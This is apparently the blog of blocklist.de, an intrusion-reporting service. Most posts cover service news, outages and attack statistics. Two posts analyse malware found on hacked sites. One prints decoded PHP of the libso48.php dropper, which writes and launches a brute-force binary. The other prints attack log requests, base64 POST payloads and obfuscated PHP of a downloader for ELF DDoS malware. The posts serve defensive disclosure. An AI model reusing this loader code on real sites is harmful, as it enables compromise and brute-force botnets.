2010
04.23

Der Blog von www.blocklist.de wird hauptsächlich zum archivieren von Statistiken verwendet.

Wenn es mal was interessantes gibt, wird dies hier veröffentlicht. Dazu gehört z.B. neue Angriffe oder Wellen von neue Muster oder wenn eine Art von Angriffen einem Bot-Netz oder einem Wurm zugeordnet werden konnte.

-google-ads-
2022
02.28

Exciting news about blocklist.de

https://www.prnewswire.com/news-releases/abusix-inc-to-take-over-the-operation-of-blocklistde—a-free-intrusion-detection-intelligence-service-301490589.html?tc=eml_cleartime

 

BOSTON and MUNICH, Feb. 28, 2022 /PRNewswire/ — Abusix, a network security company for mail security and abuse report handling, takes over blocklist.de to integrate it within its Abusix platform to further improve its data quality.

 

Blocklist.de is based on the popular open-source intrusion prevention framework fail2ban, which is part of almost every Linux distribution in the market. It is widely used to protect systems from simple brute force attacks, by logging intrusion attempts on a variety of available services and blocking IPs based on too many authentication failures.

„Blocklist.de, in addition to fail2ban, offers a way to share information about intrusion attempts with other users of the service to improve coverage,“ says Martin Schiftan, founder of blocklist.de. „In addition, we report those intrusion attempts back to the network operator in question for proper abuse management.“

 

Martin Schiftan started blocklist.de in 2006 and grew the service to several thousand users, processing hundreds of thousands of security events per day. While running multiple projects, Martin Schiftan realized that he could not prioritize every single project the same. As blocklist.de is already using Abusix’s ContactDB and the reporting format XARF, the decision to ask Abusix to take over blocklist.de was set.

„Having a similar mindset and sharing the same ideas about improving the internet, it was a pretty easy decision from our side to integrate blocklist.de into our Abusix services,“ states Tobias Knecht, founder and CEO of Abusix.

For the time being, nothing will change for the existing blocklist.de user base. Within the next few months, Abusix is planning to integrate the blocklist.de services within its platform gradually, so that the existing userbase can benefit from even more lists and features.

 

The Abusix Platform is an advanced data platform that collects security-focused data from thousands of internal and external sources. It processes, enriches, and vets this information and makes it available to a broad audience based on their use cases, such as abuse management, spam and traffic filtering, and many more.

 

About Abusix
Abusix provides the missing piece in today’s network security environment that allows for quick and reliable mitigation of network abuse and other cyber threats. Hundreds of ISPs, Telcos, Cloud & Hosting providers, and Enterprises rely on Abusix to keep their networks secure and their users safe.

For more information, visit www.abusix.com

Contact:
Tamara Hurtmann
+49 721 75406590
330287@email4pr.com

SOURCE Abusix

-google-ads-
2021
04.29

MySQL Problems in the last Days

In the last Days, we had some mysql-Server issues.

The Server crashs and could only hard restarted.

We do yesterday a lot of analyze the Logfiles and optimize Settings.

We monitored the Server tonight with Debug Options, and it looks at the moment good.

We looking far on it, that he runs stable like before again.

 

Some Queries are now a little bit slower, but we work next on it again to optimize it.

Sorry for the Problems.

-google-ads-
2021
04.21

Current state. BlockList.DE is still alive

In the last years/month, it was very quite around blocklist.de

In the last time, we had changed a lot behind the System and drop a lot of Reports/Attacks, which are older then the current two Weeks.

Old stuff is already droped, but not good enough, so we got so much often Problems with the mysql-Server.

At the moment, it looks strange, because the Attacks are droping down from ~24k to 7k, but when we dont make a bug in, it will recover in the next days.

 

And so, yes blocklist.de is still alive 🙂

But it is a lot of work and i dont have enough time, so it is going slowly.

-google-ads-
2019
11.19

Bounce-Mails mit „: Command died with status 255″

In den letzten Tagen, kam es leider zu Bounce-Mails an die Fail2Ban Absender-Adresse mit einer Meldung wie:

<fail2ban@blocklist.de>: Command died with status 255

Dies ist nun gefixt.

 

 

Ebenso ist noch ein anderer Bug offen, wo ich noch dran bin.

Auch bei den Statistiken, aber das ist leider aufgrund der hohen Menge nicht gut zu skalieren und dort stoße ich immer wieder auf Probleme.

 

 

Und ja, das Projekt lebt noch und wird bald auch in Virustotal mit aufgenommen 🙂

Auch in der letzten Zeit, ist der Intervall, wann die Support-Mails abgearbeitet werden, etwas größer geworden, da bin ich schon dran. Alle Mails, welche aber zu alt sind, werden als „resolved“ markiert und somit ein Schnitt gemacht.

-google-ads-
2016
05.03

A half year ago, since the first News comes up, that the Updates for the Debian-LTS from Update is near EndOfLife, we have tried to upgrade the blocklist.de-Systems.
But it was to hard 🙁

Because there was a lot of Changes, which need to manually fixed.

We have copied the Data to a vps and worked with them. So we update the System -> crash… Rockbackup, fixed the Error, Update -> crash…. and again and again…….

After round about 6 Months later, we had fixed all Errors and run now all Systems with the latest Version of the OS.

After the first stable Updates, there was a some Bugs, we dont see, but the BlockList.de-User has informed and helped us, to fix this.

So, now the Blocklist.de-Site is almost as soon as the previous System (with a little bit more Caching).

 

Only the Munin-Pictures are broken at the moment, because there was too many Users for the Munin-System. But we work on it and for the most Graphs, the creating works again fine.

The Website has an A+-Raking at ssllabs now:

blocklist.de-ssllabs

https://www.ssllabs.com/ssltest/analyze.html?d=blocklist.de&s=185.21.103.31

 

blocklist.de-ssltools

https://de.ssl-tools.net/webservers/www.blocklist.de

 

 

And also the Mailsystem:

MX Server Pref Con-
nect
All-
owed
Can
Use
TLS
Adv
Cert
OK
TLS
Neg
Sndr
OK
Rcvr
OK
smtp-mx.blocklist.de
[93.180.154.80]
10 OK
(134ms)
OK
(135ms)
OK
(136ms)
OK
(137ms)
OK
(442ms)
OK
(136ms)
OK
(136ms)
FAIL *
smtp-mx2.blocklist.de
[46.252.26.16]
20 OK
(181ms)
OK
(182ms)
OK
(180ms)
OK
(180ms)
OK
(467ms)
OK
(183ms)
OK
(187ms)
FAIL *
webserver3.blocklist.de
[185.21.103.31]
70 OK
(140ms)
OK
(8,253ms)
OK
(131ms)
OK
(131ms)
OK
(443ms)
OK
(132ms)
OK
(141ms)
FAIL *
smtp-mx.blocklist.de
[93.180.154.80]
80 OK
(137ms)
OK
(136ms)
OK
(133ms)
OK
(133ms)
OK
(373ms)
OK
(134ms)
OK
(136ms)
OK
(251ms)

* = greylisting for the tested Address is active.

 

blocklist.de-ssltools-mx

https://de.ssl-tools.net/mailservers/smtp-mx.blocklist.de

What we have already build:

  • Info-Mail about Servers, which has send Reports without Logfiles
  • Info-Mail about Servers, which has send longer then 90 Days no Reports
  • Info-Mail about disabled Servers in your Profile (disabled due false-positives…..)

 

The next Step are:

  • to make the HTML and CSS ready for mobile devices.
  • a writeable API to add Servers or change settings
  • The Munin-Graphs zoom able
  • Live Attack Map like http://map.honeynet.org/ (currently offline) or http://www.sicherheitstacho.eu/
  • php7 for the Site/Api/Scripts
  • API complete as an REST-full api
  • Rsync Access for the rbl-Data
  • Upgrade the Abuse-Reports to the new (higher) dkim-key
  • Update the language Files (with google-translate) for french, chinese and more, that blocklist is available in more languages (and the Login-Sites too)
  • Generate the Statistics from the Blog (The raking from the countries and Companies) automatically.
-google-ads-
2016
01.03

WordPress BruteForce Attacks over hacked Joomla/WordPress-Sites from libworker.so/libso48.php

In the last Days, we see a lot of hacked WordPress/Joomla-Sites, which makes outgoing BruteForce-Login Attacks to other WordPress-Sites.

The Attackers create some Files with the name libso48.php, libso47.php, libso46.php and call them over GET-Requests with Parameter id:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The using UserAgent is with the String „–user-agent“:

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

 

The bad files check if the Server runs at x32 or x64 and compile a file libworker.so

The libworker.so File makes the attacks.

 

Code from the libso48.php (decoded):

<?php
header("Content-type: text/plain");
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;
$so64 = Hex-Code;
//hexcode decoded start
............
fork
INFO Started brute forcing.

path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s) 
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s) 
Error.
<INFO> (%s:%d: errno: %s) 
Started xml rpc brute force
.........
//hexcode decoded end
 
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."
";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
";
    fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."
";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>

The complete Script is decoded under unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

On the Hexcode, which was written in the libworker.so file had the following code inside:

......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 

You can see always, the Attacker use curl and Makes xmlrpc-BruteForce and normal wp-login.php WordPressBruteForce-Logins.

If you found the libso48.php or libworker.so File in your Webspace, please check, clean and update your software and stop running processes from libworker file.

-google-ads-
2015
03.06

Current Stats of BlockList.de (Traffic, User, Mysql-Load, Mails…)

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 02.2015

 

Currently, blocklist.de has the following Stats/User:

User: 2,144

Server: 2,325

Attacks: 246,084,421 since 01.01.2014

Reports: 10,092,816 since 2012

Daily Mails: ~690,500 (lower limit) ~1,450,000 (high limit)

Web-Traffic: ~309 GB

RBL-/API-Traffic: ~85 GB

Mail (In/Out)-Traffic: ~~3,528 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,4TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,5 GB each Hour out.

The Mysql-Server use now 62% from 32GB Ram (~14gb Cache). And the System-Load is in average on 1.10 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,7. The open Connections are ~25,000 on the same time

 

The complete Traffic from all Systems are round about 6,6TB in 02/2015 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2014
10.10

Current Stats of BlockList.de (Users, MySQL-Load, Traffic, Mails….)

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 09.2014

 

Currently, blocklist.de has the following Stats/User:

User: 1,719

Server: 1,932

Attacks: 282,138,414   since 05.05.2013

Reports: 8,572,275 since 2012

Daily Mails: ~750,400 (lower limit) ~1,250,000 (high limit)

Web-Traffic: ~290 GB

RBL-/API-Traffic: ~80 GB

Mail (In/Out)-Traffic: ~~3,315 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,4 GB each Hour out.

The Mysql-Server use now 60% from 32GB Ram (~14gb Cache). And the System-Load is in average on 2.40 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,6. The open Connections are ~23,000 on the same time

 

The complete Traffic from all Systems are round about 6,4TB in 09/2014 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2014
10.09

Statistics 09-2014 reborn

After 2 Years, we try to regenerate the Statistics over the countries from month to month again.

 

The Image (Up, down, same….) is the different from 2012 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 29182 CN
  2. 12068 VN
  3. 10280 IN
  4. 8157 US
  5. 7082 RU
  6. 14573 VN
  7. 5651 NoName
  8. 5216 VE
  9. 4054 BR
  10. 3986 UA

Sortiert nach Anzahl der Angriffe:

  1. 7805582 CN
  2. 6300587 US
  3. 1752518 US
  4. 1533083 PL
  5. 678569 NoName
  6. 537431 FR
  7. 175161 RU
  8. 35833 AT
  9. 35048 DE
  10. 32085 NoASN
-google-ads-
2014
09.17

The Attacks/Codes which injected the ELF ddos Malware from clodo.ru and others

I have some sites with outdated Software for a other Project.
Normally, the Site was secured with a .htaccess File. All Sites was secured by Quotas and other Tools and also monitored (sha1-filehash Checker, Processlist Checker…).

Two sites was now hacked, because the .htaccess was temporarily disabled and forgotten to reactivated.

Then there comes the following Requests to a outdated ModEvelution-Software:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx
"" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

The Post Variables was:
POST['n132a88'] = "ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7";
decoded it is only:
echo „qq11oadnq98cjnwejioln23++“;

A other Request was:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

A other Request was:

85.143.166.103 - - [07/Aug/2014:02:53:59 +0200] "POST http://ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7/assets/cache/docid_685.pageCache.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"

POST[„n0b8385“] = „JHMzOD0iV25cXGlhKm9tPX1ZVUJqd1EmZy1TTE1xXi90OlB+XHRkVFpdJzgoeGtARFwkMyMxXG4uNl9OaFIrWzl5cztDfGwhYiU1SWY0MkhPcEp1MEc8KVZgRlxye1gsRT5LXCJlY3pyIDdBdj8iOyAkR0xPQkFMU1sneHRrenA5NCddID0gJHMzOFs3MV0uJHMzOFs1MF0uJHMzOFs3MV0uJHMzOFs0OF0uJHMzOFs3M10uJHMzOFsxXS4kczM4WzRdLiRzMzhbN10uJHMzOFs4OV07ICRHTE9CQUxTWydmamlpYjUxJ10gPSAkczM4WzY2XS4kczM4WzczXS4kczM4WzFdLiRzMzhbOTBdLiRzMzhbMjVdLiRzMzhbM10uJHMzOFs2X
….
……
….
bGNyNTgnXSgkczM4LCAkczM4WzQ2XS4kczM4WzI0XS4kbnF3cnMwLCAkcHBvcWI0NykgPT0gRkFMU0UpIHsJCWlmICgkR0xPQkFMU1snandsY3I1OCddKCRzMzgsICRzMzhbMjRdLiRzMzhbMjVdLiRzMzhbN10uJHMzOFs3MV0uJHMzOFsyNF0uJG5xd3JzMCwgJHBwb3FiNDcpID09IEZBTFNFKSB7CQkJcmV0dXJuIEZBTFNFOwkJfSBlbHNlIHsJCQlyZXR1cm4gJHMzOFsyNF0uJHMzOFsyNV0uJHMzOFs3XS4kczM4WzcxXS4kczM4WzI0XS4kbnF3cnMwOwkJfQl9IGVsc2UgewkJcmV0dXJuICRzMzhbNDZdLiRzMzhbMjRdLiRucXdyczA7CX0JcmV0dXJuIEZBTFNFO30=“;

Decoded the sending Post Variable was:

$s38="Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G< )V`F\r{X,E>K\"eczr 7Av?";
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];

… Truncat against Kaspersky says it is an Virus…. aaaaaahhhhhhhh

=$s38[50].$s38[25].$s38[25].$s38[71].$s38[26].$s38[24].$s38[24].$s38[1].$s38[6].$s38[25].$s38[89].$s38[56].$s38[46].$s38[4].$s38[92].$s38[25].$s38[18].$s38[71].$s38[4].$s38[92].$s38[25].$s38[1].$s38[89].$s38[92].$s38[46].$s38[1].$s38[89].$s38[25].$s38[24].$s38[56].$s38[7].$s38[47].$s38[67];
$zxozz28 = $s38[83].$s38[40].$s38[78].$s38[19].$s38[49].$s38[48].$s38[19].$s38[85].$s38[19].$s38[19].$s38[65].$s38[70].$s38[49].$s38[48].$s38[58].$s38[70].$s38[70].$s38[87].$s38[65].$s38[85].$s38[8].$s38[27].$s38[1].$s38[72].$s38[37].$s38[27].$s38[40].$s38[21].$s38[55].$s38[27].$s38[3].$s38[44].$s38[55].$s38[90].$s38[31].$s38[14].$s38[52].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[75].$s38[37].$s38[73].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[13].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[40].$s38[64].$s38[42].$s38[90].$s38[69].$s38[65].$s38[35].$s38[70].$s38[13].$s38[65].$s38[91].$s38[49].$s38[31].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[55].$s38[27].$s38[40].$s38[64].$s38[73].$s38[30].$s38[13].$s38[14].$s38[42].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[68].$s38[27].$s38[40].$s38[64].$s38[73].$s38[10].$s38[31].$s38[14].$s38[91].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[50].$s38[27].$s38[40].$s38[64].$s38[17].$s38[90].$s38[31].$s38[14].$s38[14].$s38[21].$s38[13].$s38[67].$s38[25].$s38[10].$s38[69].$s38[85].$s38[35].$s38[27].$s38[7].$s38[64].$s38[42].$s38[27].$s38[75].$s38[71].$s38[68].$s38[30].$s38[1].$s38[65].$s38[67].$s38[20].$s38[19].$s38[44].$s38[13].$s38[10].$s38[0].$s38[80].$s38[37].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[74].$s38[52].$s38[20].$s38[0].$s38[64].$s38[42].$s38[27].$s38[40].$s38[64].$s38[17].$s38[30].$s38[91].$s38[37].$s38[22].$s38[30].$s38[1].$s38[32].$s38[55].$s38[70].$s38[58].$s38[74].$s38[25].$s38[10].$s38[75].$s38[49].$s38[68].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[44].$s38[13].$s38[10].$s38[91].$s38[95].$s38[56].$s38[90].$s38[7].$s38[71].$s38[55].$s38[27].$s38[3].$s38[44].$s38[17].$s38[30].$s38[91].$s38[14].$s38[52].$s38[90].$s38[83].$s38[90].$s38[35].$s38[4].$s38[1].$s38[32].$s38[68].$s38[90].$s38[13].$s38[17].$s38[25].$s38[20].$s38[83].$s38[80].$s38[68].$s38[10].$s38[42].$s38[32].$s38[37].$s38[20].$s38[69].$s38[49].$s38[42].$s38[32].$s38[42].$s38[12].$s38[94].$s38[20].$s38[42].$s38[72].$s38[13].$s38[90].$s38[69].$s38[10].$s38[56].$s38[10].$s38[0].$s38[44].$s38[96].$s38[20].$s38[0].$s38[78].$s38[6].$s38[49].$s38[19].$s38[37].$s38[55].$s38[4].$s38[1].$s38[65].$s38[52].$s38[20].$s38[83].$s38[80].$s38[42].$s38[27].$s38[40].$s38[64].$s38[73].$s38[32].$s38[7].$s38[95].$s38[35].$s38[4].$s38[69].$s38[6].$s38[55].$s38[21].$s38[13].$s38[95].$s38[52].$s38[20].$s38[0].$s38[64].$s38[7].$s38[10].$s38[40].$s38[14].$s38[8];
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]);
$igekj52 = $GLOBALS['xtkzp94']($s38[7]);
echo $s38[76].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
for (;;)
{
if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]))
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[44].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[56].$s38[50].$s38[89].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[86];
break;
}
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37])
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[68].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[60].$s38[3].$s38[1].$s38[73].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$mqcjh70.$s38[86];
break;
}
$nneyn30 = $s38[71].$s38[56];
$cttgs64 = "";
if ($GLOBALS['aojaf86']($GLOBALS['dfyoo42'](~0)) == 64)
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[47].$s38[67].$s38[86];
$cttgs64 = $rmznz0;
}
else
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[42].$s38[68].$s38[86];
$cttgs64 = $dfdjy19;
}
$pjimj72 = "";
if (!$GLOBALS['gwigy41']($nneyn30))
{
$pjimj72 = $GLOBALS['vziql67']($s38, $cttgs64, $nneyn30);
if ( $pjimj72 == FALSE)
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[67].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[30].$s38[6].$s38[14].$s38[1].$s38[60].$s38[93].$s3... Truncat against Kaspersky says it is an Virus.... aaaaaahhhhhhhh
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[64].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[30].$s38[6].$s38[1].$s38[89].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[68].$s38[8].$cgthg36.$s38[86];
$GLOBALS['tkjre65'](1);
$GLOBALS['jtjiv94']($pjimj72);
break;
}
echo $s38[76].$s38[24].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];

function fildv12($s38, $htxbt38)
{
$ppoqb47 = „“;
$ogrpt28 = @$GLOBALS[‚fjcva91‘]($htxbt38, $s38[92].$s38[62]);
if ($ogrpt28 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[90].$s38[73].$s38[92].$s38[60].$s38[48].$s38[3].$s38[1].$s38[3].$s38[25]))
return FALSE;
$henof76 = @$GLOBALS[‚dmrqg14′]();
@$GLOBALS[’npbou10′]($henof76, CURLOPT_URL, $htxbt38);
@$GLOBALS[’npbou10‘]($henof76, CURLOPT_RETURNTRANSFER, true);
$ppoqb47 = @$GLOBALS[‚hjiar61‘]($henof76);
@$GLOBALS[‚ekyyn43‘]($henof76);
}
else
{
while(!$GLOBALS[‚mashg65‘]($ogrpt28))
$ppoqb47.=$GLOBALS[‚udsvx59′]($ogrpt28, 1024 * 64 );
$GLOBALS[’naftp70‘]($ogrpt28);
}
return $ppoqb47;
}

function eghou87($s38, $yaxje72, $ppoqb47)
{
$negtx78 = $GLOBALS[‚fjcva91‘]($yaxje72, $s38[14].$s38[62].$s38[52]);
if ($negtx78 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[66].$s38[3].$s38[60].$s38[89].$s38[48].$s38[71].$s38[73].$s38[25].$s38[48].$s38[90].$s38[6].$s38[1].$s38[25].$s38[89].$s38[1].$s38[25].$s38[56]))
return FALSE;
if ( @$GLOBALS[‚wtxbv81‘]($yaxje72, $ppoqb47) === FALSE )
return FALSE;
}
else
{
$jznmi77 = $GLOBALS[‚acklf72‘]($negtx78, $ppoqb47, $GLOBALS[‚aojaf86′]($ppoqb47));
$GLOBALS[’naftp70‘]($negtx78);
if ($jznmi77 == FALSE || $jznmi77 != $GLOBALS[‚aojaf86‘]($ppoqb47))
return FALSE;
}
return TRUE;
}

function gbzrm90($s38, $htxbt38, $nqwrs0)
{
$ppoqb47 = $GLOBALS[‚adwwg63‘]($s38, $htxbt38);
if ($ppoqb47 == FALSE)
return FALSE;
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[46].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
return FALSE;
}
else
{
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0;
}
}
else
{
return $s38[46].$s38[24].$nqwrs0;
}
return FALSE;
}

A short lock shows, that the Code check with php_uname the System and downloads a xxxx64/xxxx32 File which was analysed from our Friends from MalwareMastDie under:
http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html

For more Informations and Updates, you can follow MalwareMustDie on Twitter:
https://twitter.com/MalwareMustDie


So, please update and secure all your sites and scripts!

If you have Questions, please contact us 🙂

-google-ads-
Translate »